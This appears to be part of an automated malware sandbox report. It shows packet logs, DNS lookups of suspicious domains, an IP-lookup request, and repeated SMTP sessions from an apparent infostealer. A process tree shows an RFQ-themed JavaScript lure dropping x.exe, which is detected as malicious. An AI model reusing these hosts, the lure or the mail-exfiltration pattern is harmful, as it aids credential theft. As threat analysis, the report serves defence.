                                                                                  Sep 26, 2024 09:21:56.257008076 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.257106066 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.257106066 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.257162094 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.263473034 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263499022 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263537884 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263556004 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263572931 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263592958 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263622046 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263643026 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263737917 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263751030 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263798952 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263813972 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263860941 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263880014 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263964891 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.263999939 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264027119 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264041901 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264061928 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264079094 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264107943 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264127970 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264154911 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264169931 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264225006 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.264240980 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.297363043 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.302294016 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.312067986 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:56.317065001 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317087889 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317140102 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317166090 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317193031 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317210913 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317251921 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317401886 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317517042 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317552090 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317579031 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317589998 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317612886 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317631006 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.317651033 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:56.359885931 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.156368971 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.203623056 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:57.257222891 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:57.262331963 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.387967110 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.395272970 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:57.401607037 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.401622057 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.401647091 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.401654959 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.401673079 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.401702881 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.402837992 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.402894020 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.574151993 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:57.625513077 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:57.654623985 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:57.659746885 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:58.853836060 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:58.906733036 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:00.347750902 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:00.352818966 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:00.514717102 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:00.518184900 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:00.528666019 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:00.681627035 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:00.686261892 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:00.695861101 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.473427057 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.476953983 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:01.481808901 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.645730019 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.648761034 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:01.653573990 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.782648087 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:01.809750080 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:01.817126036 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.143554926 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.168029070 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:02.171643972 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.172811031 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.172879934 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:02.310338020 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.359882116 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:02.584849119 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:22:02.628845930 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:22:02.628911018 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:23:15.010590076 CEST62829587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:15.015599012 CEST5876282951.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:15.192359924 CEST5876282951.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:15.192955017 CEST62829587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:15.193985939 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:15.198921919 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:15.199017048 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:15.946958065 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:15.947139978 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:15.951998949 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.129198074 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.130474091 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.135438919 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.311811924 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.312205076 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.317183971 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.504060984 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.504152060 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.504165888 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.504195929 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.510462999 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.515976906 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.691560030 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.695118904 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.700160027 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.876224041 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:16.876451969 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:16.882424116 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.058520079 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.058790922 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.063711882 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.246187925 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.246465921 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.251408100 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.427495956 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.427815914 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.434123993 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.613518000 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.613960981 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.618984938 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.794615030 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.795079947 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.795133114 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.795133114 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.795238972 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.797177076 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.800101042 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.800263882 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.800275087 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.800393105 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.802138090 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.802218914 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.802265882 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.802376032 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.803236961 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.803437948 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.805934906 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.806209087 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.807630062 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.809272051 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.809616089 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.809648991 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.809776068 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.811321020 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.811373949 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.811434984 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.811463118 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.811506987 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.811536074 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.814307928 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814359903 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814392090 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814445019 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.814492941 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814496040 CEST62835587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:23:17.814521074 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814569950 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814596891 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814623117 CEST5876283551.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:23:17.814649105 CEST5876283551.195.88.199192.168.2.8
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Sep 26, 2024 09:21:34.257762909 CEST | 53 | 64381 | 1.1.1.1 | 192.168.2.8 |
| Sep 26, 2024 09:21:41.444951057 CEST | 59483 | 53 | 192.168.2.8 | 1.1.1.1 |
| Sep 26, 2024 09:21:41.455045938 CEST | 53 | 59483 | 1.1.1.1 | 192.168.2.8 |
| Sep 26, 2024 09:21:42.467835903 CEST | 56003 | 53 | 192.168.2.8 | 1.1.1.1 |
| Sep 26, 2024 09:21:42.474724054 CEST | 53 | 56003 | 1.1.1.1 | 192.168.2.8 |
| Sep 26, 2024 09:21:45.132641077 CEST | 61486 | 53 | 192.168.2.8 | 1.1.1.1 |
| Sep 26, 2024 09:21:45.778862000 CEST | 53 | 61486 | 1.1.1.1 | 192.168.2.8 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 26, 2024 09:21:41.444951057 CEST | 192.168.2.8 | 1.1.1.1 | 0xc9fa | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:42.467835903 CEST | 192.168.2.8 | 1.1.1.1 | 0x8b46 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:45.132641077 CEST | 192.168.2.8 | 1.1.1.1 | 0x84ec | Standard query (0) | s82.gocheapweb.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 26, 2024 09:21:41.455045938 CEST | 1.1.1.1 | 192.168.2.8 | 0xc9fa | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:42.474724054 CEST | 1.1.1.1 | 192.168.2.8 | 0x8b46 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:42.474724054 CEST | 1.1.1.1 | 192.168.2.8 | 0x8b46 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:42.474724054 CEST | 1.1.1.1 | 192.168.2.8 | 0x8b46 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| Sep 26, 2024 09:21:45.778862000 CEST | 1.1.1.1 | 192.168.2.8 | 0x84ec | No error (0) | s82.gocheapweb.com | | 51.195.88.199 | A (IP address) | IN (0x0001) | false |
• api.ipify.org

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.8 | 62826 | 104.26.13.205 | 443 | 5496 | C:\Users\user\AppData\Local\Temp\neworigin.exe |

| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-09-26 07:21:43 UTC | 155 | OUT | GET / HTTP/1.1 |
| | | | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 |
| | | | Host: api.ipify.org |
| | | | Connection: Keep-Alive |
| 2024-09-26 07:21:44 UTC | 211 | IN | HTTP/1.1 200 OK |
| | | | Date: Thu, 26 Sep 2024 07:21:44 GMT |
| | | | Content-Type: text/plain |
| | | | Content-Length: 11 |
| | | | Connection: close |
| | | | Vary: Origin |
| | | | CF-Cache-Status: DYNAMIC |
| | | | Server: cloudflare |
| | | | CF-RAY: 8c917fb31cdc4390-EWR |
| 2024-09-26 07:21:44 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 |
| | | | Data Ascii: 8.46.123.33 |


| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
|---|---|---|---|---|---|
| Sep 26, 2024 09:21:46.521976948 CEST | 587 | 62828 | 51.195.88.199 | 192.168.2.8 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:21:46 +0000 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Sep 26, 2024 09:21:46.527331114 CEST | 62828 | 587 | 192.168.2.8 | 51.195.88.199 | EHLO 061544 |
| Sep 26, 2024 09:21:46.708118916 CEST | 587 | 62828 | 51.195.88.199 | 192.168.2.8 | 250-s82.gocheapweb.com Hello 061544 [8.46.123.33] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPECONNECT |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Sep 26, 2024 09:21:46.713567972 CEST | 62828 | 587 | 192.168.2.8 | 51.195.88.199 | STARTTLS |
| Sep 26, 2024 09:21:46.895086050 CEST | 587 | 62828 | 51.195.88.199 | 192.168.2.8 | 220 TLS go ahead |
| Sep 26, 2024 09:21:49.888391972 CEST | 587 | 62829 | 51.195.88.199 | 192.168.2.8 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:21:49 +0000 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Sep 26, 2024 09:21:49.888659954 CEST | 62829 | 587 | 192.168.2.8 | 51.195.88.199 | EHLO 061544 |
| Sep 26, 2024 09:21:50.197284937 CEST | 587 | 62829 | 51.195.88.199 | 192.168.2.8 | 250-s82.gocheapweb.com Hello 061544 [8.46.123.33] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPECONNECT |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Sep 26, 2024 09:21:50.197479010 CEST | 62829 | 587 | 192.168.2.8 | 51.195.88.199 | STARTTLS |
| Sep 26, 2024 09:21:50.379153967 CEST | 587 | 62829 | 51.195.88.199 | 192.168.2.8 | 220 TLS go ahead |
| Sep 26, 2024 09:23:15.946958065 CEST | 587 | 62835 | 51.195.88.199 | 192.168.2.8 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:23:15 +0000 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Sep 26, 2024 09:23:15.947139978 CEST | 62835 | 587 | 192.168.2.8 | 51.195.88.199 | EHLO 061544 |
| Sep 26, 2024 09:23:16.129198074 CEST | 587 | 62835 | 51.195.88.199 | 192.168.2.8 | 250-s82.gocheapweb.com Hello 061544 [8.46.123.33] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
| | | | | | 250-PIPECONNECT |
| | | | | | 250-STARTTLS |
| | | | | | 250 HELP |
| Sep 26, 2024 09:23:16.130474091 CEST | 62835 | 587 | 192.168.2.8 | 51.195.88.199 | STARTTLS |
| Sep 26, 2024 09:23:16.311811924 CEST | 587 | 62835 | 51.195.88.199 | 192.168.2.8 | 220 TLS go ahead |
| Sep 26, 2024 09:23:24.650676966 CEST | 587 | 62836 | 51.195.88.199 | 192.168.2.8 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Thu, 26 Sep 2024 07:23:24 +0000 |
| | | | | | 220-We do not authorize the use of this system to transport unsolicited, |
| | | | | | 220 and/or bulk e-mail. |
| Sep 26, 2024 09:23:24.650934935 CEST | 62836 | 587 | 192.168.2.8 | 51.195.88.199 | EHLO 061544 |
| Sep 26, 2024 09:23:24.838011026 CEST | 587 | 62836 | 51.195.88.199 | 192.168.2.8 | 250-s82.gocheapweb.com Hello 061544 [8.46.123.33] |
| | | | | | 250-SIZE 52428800 |
| | | | | | 250-8BITMIME |
| | | | | | 250-PIPELINING |
                                                                                  250-PIPECONNECT
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Sep 26, 2024 09:23:24.838496923 CEST62836587192.168.2.851.195.88.199STARTTLS
                                                                                  Sep 26, 2024 09:23:25.026016951 CEST5876283651.195.88.199192.168.2.8220 TLS go ahead

                                                                                  Target ID:1
                                                                                  Start time:03:21:13
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js"
                                                                                  Imagebase:0x7ff6a68e0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:03:21:16
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:03:21:20
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:03:21:20
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:03:21:23
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:03:21:24
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:03:21:27
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:03:21:27
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:03:21:31
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
